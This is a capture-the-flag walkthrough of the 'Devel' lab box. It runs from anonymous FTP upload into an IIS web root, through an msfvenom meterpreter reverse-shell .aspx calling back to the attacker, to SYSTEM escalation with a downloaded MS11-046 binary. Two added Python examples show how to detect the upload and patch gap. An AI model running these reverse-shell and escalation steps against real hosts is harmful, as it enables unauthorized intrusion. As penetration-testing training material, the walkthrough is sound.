Enumeration

We start our enumeration with nmap, as always:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
| 08-18-24  10:04AM                    6 test.txt
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We have FTP available on port 21, and anonymous access is allowed with the credentials anonymous:anonymous. The listing (aspnet_client, iisstart.htm, welcome.png) shows the FTP root is the IIS web root, and the successful put of test.txt below shows we have write access to it.

220 Microsoft FTP Service
Name (10.129.110.15:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
100% |***************************************|     6      119.57 KiB/s    --:-- ETA
226 Transfer complete.
6 bytes sent in 00:00 (0.05 KiB/s)
ftp>

With port 80 serving a web server whose iisstart.htm sits in the same directory we can write to over FTP, the FTP root is the directory IIS serves from. That gives us a path to exploitation.

Initial Foothold

IIS is Microsoft's default web server. Out of the box it serves .asp and .aspx files plus a handful of other types, and it can be extended to serve Node.js and PHP, although that is not in use on this server.

msfvenom can generate reverse shells in aspx format, so we can create one, upload it over FTP and see if we get a callback.

To create our reverse shell, we can run this command (changing HOST and PORT as necessary):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<HOST> LPORT=<PORT> -f aspx > reverse.aspx

Then it can be uploaded in the FTP session with:

bin
put reverse.aspx

Note: binary mode (bin) may be required so the payload is uploaded intact.

Browsing to /reverse.aspx triggers the reverse shell, which can be caught in msfconsole with exploit/multi/handler configured with the same payload, LHOST and LPORT used for msfvenom.

[*] Started reverse TCP handler on 10.10.14.23:4444
[*] Sending stage (176198 bytes) to 10.129.110.15
[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.129.110.15:49169) at 2024-08-18 17:17:31 +1000

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

We land on the machine as the IIS APPPOOL user.
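From the defender's side, the whole foothold above (anonymous FTP write into the web root, then a browser request for the dropped .aspx) is visible in two logs IIS 7.5 already writes: the FTP site log and the HTTP site log, both in W3C extended format. The following is an added example, not part of the write-up, that correlates a successful STOR of a web-executable file with a later HTTP request for the same path. The column order is read from each file's #Fields header; the sample log lines are constructed (the IPs are the ones from the write-up, the timestamps and session id are invented).

```python
"""Spot a web shell dropped over FTP by correlating IIS FTP and HTTP logs.

Added illustration, not from the write-up. Column layouts come from each log's
#Fields header; the constructed samples below assume the IIS 7.5 defaults.
"""
from datetime import datetime, timedelta

# Extensions IIS hands to a script engine: an upload of one of these into the
# web root is suspicious by itself, and a later HTTP request for it is execution.
WEB_EXECUTABLE = {".asp", ".aspx", ".ashx", ".asmx"}

# Constructed sample logs (IPs from the write-up, timestamps and session id invented).
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2024-08-18 07:15:02 10.10.14.23 anonymous 10.129.110.15 21 USER anonymous 331 0 0 a1b2c3 -
2024-08-18 07:15:02 10.10.14.23 anonymous 10.129.110.15 21 PASS *** 230 0 0 a1b2c3 /
2024-08-18 07:15:40 10.10.14.23 anonymous 10.129.110.15 21 STOR test.txt 226 0 0 a1b2c3 /test.txt
2024-08-18 07:16:10 10.10.14.23 anonymous 10.129.110.15 21 STOR reverse.aspx 226 0 0 a1b2c3 /reverse.aspx
"""

HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-08-18 07:16:05 10.129.110.15 GET /iisstart.htm - 80 - 10.10.14.23 Mozilla/5.0 200 0 0 15
2024-08-18 07:16:31 10.129.110.15 GET /reverse.aspx - 80 - 10.10.14.23 Mozilla/5.0 200 0 0 1203
"""


def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the names in its #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-assign columns
        rows.append(dict(zip(fields, values)))
    return rows


def _ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")


def _ext(path):
    dot = path.rfind(".")
    return path[dot:].lower() if dot >= 0 else ""


def ftp_web_uploads(ftp_rows):
    """Successful STOR of a web-executable file, with its web-root-relative path."""
    hits = []
    for r in ftp_rows:
        if r.get("cs-method") != "STOR" or not r.get("sc-status", "").startswith("2"):
            continue
        path = r.get("x-fullpath", "-")
        if path == "-":  # older layouts lack x-fullpath; fall back to the STOR argument
            path = "/" + r.get("cs-uri-stem", "").lstrip("/")
        if _ext(path) in WEB_EXECUTABLE:
            hits.append({"file": path, "uploaded_at": _ts(r),
                         "uploader_ip": r.get("c-ip"), "ftp_user": r.get("cs-username")})
    return hits


def detect_webshell_uploads(ftp_log, http_log, window=timedelta(hours=1)):
    """One alert per web-executable upload; severity becomes 'high' when any HTTP
    request for the same path (case-insensitive, as on Windows) follows within `window`."""
    http_rows = sorted(parse_w3c(http_log), key=_ts)
    alerts = []
    for up in ftp_web_uploads(parse_w3c(ftp_log)):
        up.update(severity="medium", requested_at=None, requester_ip=None)
        for r in http_rows:
            t = _ts(r)
            if (r.get("cs-uri-stem", "").lower() == up["file"].lower()
                    and up["uploaded_at"] <= t <= up["uploaded_at"] + window):
                up.update(severity="high", requested_at=t, requester_ip=r.get("c-ip"))
                break
        alerts.append(up)
    return sorted(alerts, key=lambda a: a["uploaded_at"])


if __name__ == "__main__":
    for a in detect_webshell_uploads(FTP_LOG, HTTP_LOG):
        print(f"[{a['severity']}] {a['file']} stored by {a['ftp_user']}@{a['uploader_ip']} "
              f"at {a['uploaded_at']}; first requested {a['requested_at']} from {a['requester_ip']}")
```

On the sample, test.txt is ignored and reverse.aspx produces a single high-severity alert because the GET from the same address follows the STOR by 21 seconds. An upload with no follow-up request still yields a medium alert, since the file is sitting in the web root either way.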

Escalation

The box is old and unpatched, which is revealed by running systeminfo from the shell we now have. I used local_exploit_suggester from Metasploit, but none of the exploits it suggested will work, so I'm not sure what checks they are doing to determine eligibility. Some of them aren't even for this version of Windows. Might be a bug at the time of writing.

One exploit that does work is MS11-046, for which a pre-compiled binary is available at https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046.

Using the open meterpreter shell, I uploaded the exploit to a temp folder and executed it to get root:

meterpreter > upload ~/Downloads/MS11-046.exe
[*] Uploading  : /home/kali/Downloads/MS11-046.exe -> MS11-046.exe
[*] Uploaded 110.17 KiB of 110.17 KiB (100.0%): /home/kali/Downloads/MS11-046.exe -> MS11-046.exe
[*] Completed  : /home/kali/Downloads/MS11-046.exe -> MS11-046.exe
meterpreter > shell
Process 2332 created.
Channel 26 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\temp>.\MS11-046.exe
.\MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>
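The escalation works only because the host is Windows 7 RTM (build 7600, no service pack) with the MS11-046 fix absent, which is exactly what systeminfo exposes. The following is an added example, not part of the write-up, that parses systeminfo output into a patch inventory and checks it against a required-KB baseline. The sample output is constructed (English labels, whereas the el_GR box would print localised ones; the installed KB numbers are just sample values). The baseline maps MS11-046 to KB2503665, the update number Microsoft published for that bulletin.

```python
"""Parse systeminfo output and flag patch gaps. Added illustration, not from the write-up."""
import re

# Constructed sample (English-locale systeminfo; the installed KBs are sample values).
SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Domain:                    HTB
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
Network Card(s):           1 NIC(s) Installed.
"""

# KB -> bulletin baseline; MS11-046 shipped as KB2503665. Extend to taste.
REQUIRED = {"KB2503665": "MS11-046"}


def parse_systeminfo(text):
    """Extract host/OS fields, build, service pack and the installed hotfix set."""
    info = {"hotfixes": set()}
    for line in text.splitlines():
        m = re.match(r"^(Host Name|OS Name|OS Version|System Type|Domain):\s+(.*\S)", line)
        if m:
            info[m.group(1).lower().replace(" ", "_")] = m.group(2)
        kb = re.search(r"\[\d+\]:\s*(KB\d+)", line)
        if kb:
            info["hotfixes"].add(kb.group(1))
    # "6.1.7600 N/A Build 7600" or "6.1.7601 Service Pack 1 Build 7601"
    m = re.match(r"(\S+)\s+(.+?)\s+Build\s+(\d+)", info.get("os_version", ""))
    if m:
        info["version"], sp, info["build"] = m.group(1), m.group(2), int(m.group(3))
        info["service_pack"] = None if sp == "N/A" else sp
    return info


def assess(info, required=REQUIRED):
    """List required KBs that are missing, plus a finding for unserviced Windows 7 RTM."""
    missing = sorted(kb for kb in required if kb not in info["hotfixes"])
    findings = [f"{kb} ({required[kb]}) not installed" for kb in missing]
    if info.get("build") == 7600 and info.get("service_pack") is None:
        findings.append("Windows 7 RTM (build 7600) without SP1: no longer serviced by Microsoft")
    return {"missing": missing, "findings": findings, "patched": not findings}


if __name__ == "__main__":
    inventory = parse_systeminfo(SYSTEMINFO)
    print(f"{inventory['host_name']}: {inventory['os_name']} build {inventory['build']}, "
          f"{len(inventory['hotfixes'])} hotfixes")
    for finding in assess(inventory)["findings"]:
        print(" -", finding)
```

Run against real systeminfo output captured from a host (or from many hosts in a loop), the same two functions give a quick list of boxes where this class of kernel-driver escalation is still on the table; the same check is what local_exploit_suggester is approximating when it decides which modules to propose.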